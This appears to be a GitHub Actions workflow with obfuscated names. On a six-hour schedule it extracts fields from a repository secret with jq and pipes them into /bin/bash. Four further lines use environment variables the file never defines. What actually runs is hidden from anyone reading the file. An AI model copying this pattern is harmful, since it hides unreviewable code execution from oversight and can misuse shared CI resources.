name: zaifengzf

on:
  workflow_dispatch:
  schedule:
    - cron: '24 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zaifengzf
        env:
          szcdn77: ${{ secrets.szcdn77 }}
        run: |
          echo $szcdn77 | jq -r .iini00690 | /bin/bash
          echo $lwlzj4 | jq -r .jkxg1 | /bin/bash
          echo $z3 | jq -r .efz1664 | /bin/bash
          echo $kzf46416 | jq -r .wthu19 | /bin/bash
          echo $ajwz059 | jq -r .d2 | /bin/bash

